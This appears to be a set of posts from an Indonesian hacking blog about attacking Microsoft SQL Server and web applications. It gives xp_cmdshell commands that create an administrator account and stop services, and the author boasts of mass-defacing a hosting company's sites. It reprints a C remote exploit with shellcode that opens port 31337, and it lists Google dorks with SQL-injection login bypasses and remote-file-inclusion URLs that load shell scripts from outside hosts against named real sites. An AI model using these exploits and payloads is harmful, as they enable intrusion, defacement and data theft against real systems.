My question is this: Does anyone know if there is a way to extract the


user/pw information fromthe NTDS.DIT file (rather than from
lsass.exe on the server) into a hashedfile that I can then crack with
John? If not, does anyone have any other suggestions on what I can
do with thisNTDS.DIT file to crack it?

0 comments

SQL Server Bugs

at 10:29 AM Posted by Ade cahya

Bagi Anda orang IT pasti sudah tidak asing lagi mendengar nama
Microsoft SQL Server. Produk RDBMS terkenal buatan Microsoft ini
memang sangat banyak dipakai di seluruh dunia oleh perusahaan-
perusahaan untuk menyimpan informasi dan aset digital mereka.
Banyak yang menggantungkan nasib perusahaan pada sang SQL
Server.

Namun kesalahan konfigurasi atau miskonfigurasi dari SQL Server


bisa menyebabkan suatu keadaan yang fatal bagi sistem database
dan bahkan mengakibatkan efek yang berbahaya bagi sistem
komputer tempat SQL Server diinstall. Bisa hapus file dan shutdown
sistem lho hueheheh ;)

Sebelumnya penulis perlu menjelaskan bahwa artikel ini tidak


mempunyai maksud tertentu selain untuk ilmu pengetahuan dan
kebebasan dalam berbagi ilmu pengetahuan. Penulis tidak
bertanggung jawab apapun terhadap segala sesuatu yang terjadi
akibat artikel ini. Artikel ini bersifat terbuka yang berarti Anda bisa
memberikan kritik dan saran terhadap artikel ini melalui
article@aritechdev.com.

Anda dilarang keras mengutip sebagian atau seluruh artikel ini tanpa
sepengetahuan penulis. SQL Server yang akan kita bahas disini
menggunakan SQL Server 7 atau bisa juga versi 2000 nya. SQL
Server 7 memberikan dua jenis autentikasi untuk mengakses server
database yaitu: 1. Windows NT Authentication Mode 2. Mixed Mode
Jika Anda menginstall SQL Server dengan menggunakan Windows
NT Authentication Mode maka secara otomatis login ke SQL Server
akan mengikuti login Windows NT dan user dari Windows NT sajalah
yang berhak untuk mengakses SQL Server.

Jika SQL Server diinstall pada Mixed Mode maka setiap user yang
login ke SQL Server bisa diautentikasi oleh Windows NT atau oleh
SQL Server itu sendiri. User login yang diautentikasi oleh SQL Server
harus memberikan username dan password yang dimaintenance
sendiri oleh SQL Server dan ini merupakan salah satu awal bencana.
Ketika Anda menginstall SQL Server pada Mixed Mode maka secara
otomatis SQL Server memiliki default account SA (system
administrator) dengan password kosong (blank password).

Jika Anda login dengan account "sa" ini maka Anda sudah memiliki
hak akses sangat luar biasa terhadap SQL Server yang meliputi
semua database, tabel, stored procedure, security dan bahkan
secara sadar atau tidak Anda juga otomatis memiliki akses besar ke
sistem komputer tempat SQL Server diinstall. Menurut pengamatan
penulis dilapangan menunjukkan bahwa masih sangat banyak sekali
SQL Server baik yang bersifat production server atau experiment
server yang ternyata belum dikonfigurasi dengan benar. Salah satu
contoh miskonfigurasi di SQL Server ya seperti yang sudah
disebutkan diatas, yaitu DBA nya lupa memberi password untuk
account "sa" dan SQL Server diinstall pada Mixed Mode.

SQL Server memiliki extended stored procedure xp_cmdshell yang


sangat mematikan. xp_cmdshell ini bisa menjalankan perintah shell
pada SQL Server seperti jika Anda mengetikkan perintah-perintah
shell pada layar console Windows NT. xp_cmdshell ini berada pada
database master dan ini juga harus diatur hak pemakaiannya atau
jika memang tidak perlu bisa dihapus. Tulisan mengenai SQL Server
security check list akan disampaikan pada kesempatan yang lain. Oh
ya, SQL Server bisa diakses oleh berbagai protokol seperti Named
Pipe Net-Library atau melalui TCP/IP. SQL Server melalui TCP/IP
akan membuka port 1433. Para pembaca mungkin masih ada yang
bingung mengenai bencana apa saja akibat miskonfigurasi diatas.

OK, penulis akan memberi contoh beberapa bencana yang mungkin


terjadi jika Anda sudah bisa login ke SQL Server sebagai user "sa":

1. Bisa membuat user pada Windows NT dengan level sekelas


Administrator. Ini bisa dicapai dengan cara mengeksekusi command
seperti berikut pada SQL Server use master xp_cmdshell 'net user
adminbaru admin /add' go xp_cmdshell 'net localgroup Administrators
adminbaru /add' go Dengan perintah diatas maka Anda membuat
user adminbaru dengan password admin pada Windows NT dan
sekaligus menjadikannya sekelas Administrator.

2. Bisa men-start atau men-stop service pada Windows NT Ini bisa


dilakukan dengan perintah net start atau net stop, contoh berikut
adalah untuk men-stop service HTTP pada Windows NT yang
berakibat matinya web server :) use master xp_cmdshell 'net stop
w3svc' go

3. Bisa membuat FTP script untuk melakukan suatu download file


dari server lain.
4. Bisa digunakan untuk men-deface website ;) Nah kalo yang ini
mungkin banyak yang suka ;) Karena men-deface lewat SQL Server
jauh lebih mudah daripada lewat bug unicode. Kalo pada bug
unicode kita masuk ke sistem sesuai denganhak akses dari user
IUSR_MACHINENAME, maka jika kita masuk ke sistem dengan SQL
Server maka kita akan masuk dengan hak akses LocalSystem
sehingga kita bisa melakukan apa saja di server, termasuk bisa men-
shutdown sistem kalo mau :) Tulisan mengenai mendeface website
dengan SQL Server akan penulis sajikan pada kesempatan lain.

5. Bisa untuk mass-defacing, ah masak? Lho iya, penulis sendiri


pernah masuk ke host SQL Server yang kebetulan adalah milik suatu
perusahaan web hosting di Israel dan kebetulan didalamnya terdapat
puluhan wwwroot untuk beberapa domain yang berbeda. Tinggal
copy aja file kita ke masing-masing folder tadi, jadilah sudah mass
defacing yang ternyata cuman masuk ke satu host saja huehehe ;)

6. Bisa mengakses registry windows yang berakibat dengan


mengambil password Windows NT atau juga membuat key dan value
pada registry. Demikian beberapa bencana yang dapat menimpa
sistem Windows NT yang terdapat SQL Server yang belum
dikonfigurasi dengan benar. Sebenarnya masih banyak lagi bencana-
bencana lain yang dapat muncul dan itu memang tergantung dari
imajinasi Anda para hacker Semakin Anda mengerti dan menguasai
suatu sistem maka semakin banyak pula trik dan kemampuan Anda
untuk mengeksploitasi sistem.

Jika Anda berminat untuk mencoba maka sekarang mulai saja men-
scan host yang port 1433 nya terbuka dan jika sudah menemukan
host yang port 1433 nya terbuka cobalah akses kesana dengan
menggunakan program Query Analyzer atau Anda juga bisa
menggunakan SQL Server query dalam mode dos yaitu isql.exe.

Jika Anda ingin mencobanya dengan ISQL maka coba ajah ketikkan
perintah berikut untuk login ke SQL Server dari command prompt:
C:>isql -S targethost -U sa Kemudian tekan enter, dan akan muncul
inputan password, terus tekan enter saja.

Jika host tersebut masih menggunakan password blank maka akan


muncul SQL prompt seperti dibawah 1> Pada prompt tersebut Anda
bisa mengetikan perintah SQL anda, misalnya seperti dibawah
1>select * from sysusers 2>go OK, akhirnya penulis berpesan bahwa
jaga baik-baik SQL Server Anda, jangan lupa untuk mengisi
password pada account "sa" (account "sa" tidak bisa di-rename atau
dihapus).

Sebenarnya masih banyak lagi yang harus diperhatikan pada SQL


Server daripada sekedar mengganti password account "sa", tetapi
dengan begitu saja sudah meminimalkan intrusion pada sistem Anda.
Terimakasih, mission complete.

0 comments

Source code Exploit MSSQL

at 10:04 AM Posted by Ade cahya

#include
#include
#include
#include

char badbuffer[] =
"\x04"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTH
CTHC"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTH
CTHC"
"\xdc\xc9\xb0\x42"
"\xeb\x0e"
"JC"
"THC!"
"\x01\x70\xae\x42"
"\x01\x70\xae\x42"
"\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66"
"\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16"
"\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1"
"\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71"
"\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f"
"\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d"
"\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29"
"\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce"
"\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4"
"\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c"
"\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25"
"\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc"
"\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78"
"\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30"
"\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca"
"\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2"
"\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62"
"\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca"
"\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b"
"\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1"
"\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65"
"\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66"
"\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5";

void usage();

int main(int argc, char *argv[])


{
unsigned short sqlport=1434;
unsigned int sock,addr,rc;
struct sockaddr_in sqludp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCsql v0.1 - Wind0wZ remote root sploit for MSSQL-


Servers < SP3\n");
printf("by Johnny Cyberpunk
(jcyberpunk@thehackerschoice.com)\n");
printf("bug was found by David Litchfield\n");

if(argc<2)
usage();

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(sqludp.sin_addr),hp->h_addr,hp->h_length);
else
sqludp.sin_addr.s_addr = addr;

if (hp)
sqludp.sin_family = hp->h_addrtype;
else
sqludp.sin_family = AF_INET;

sqludp.sin_port=htons(sqlport);

rc=connect(sock, (struct sockaddr *) &sqludp, sizeof (struct


sockaddr_in));
if(rc==0)
{
send(sock,badbuffer,sizeof(badbuffer)-1,0);
printf("\nexploit send .... sleeping a while ....\n");
Sleep(1000);
printf("\nok ... now try to connect to port 31337 via netcat !\n");
}
else
printf("can't connect to sql port udp 1434!\n");

shutdown(sock,1);
closesocket(sock);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: \n");
exit(0);

1 comments

SQL inject, bugs and....

Tuesday, February 6, 2007 at 11:46 AM Posted by Ade cahya

Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya
uptodate tiap menit bahkan detik siapa tuh yang update yahh para
hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas
apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar
menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA
BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN
INI.titik

Pembahasan:
SEMUA INI DARI SABEN ----->
------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-
server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=
http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau:
inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi :
http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-
world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolut
e_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.h
tml.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.ph
p
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?i
ncludePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-
server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http:
//one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php
?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPf
ad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http:
//geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-
ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=ht
tp://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolu
te_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-
shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosCon
fig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php
?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://el
ang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas
ente ente sekalian nyari sqlnya hak hak hak
inurl:"/DoceboScs"
injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://ela
ng13.org/hitam.txt?
inurl:"/DoceboCore"
injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://ela
ng13.org/hitam.txt?
inurl:"/DoceboLms"
injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http:/
/elang13.org/hitam.txt?
inurl:"/DoceboKms"
injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[wher
e_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS"
injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=
http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=
http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.
org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://el
ang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/ite
m.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.t
xt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama
admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan
/admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses
ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51,
255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredi
ts/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.co
m/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass
values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"contoh gambar di bawah ini...!

You might also like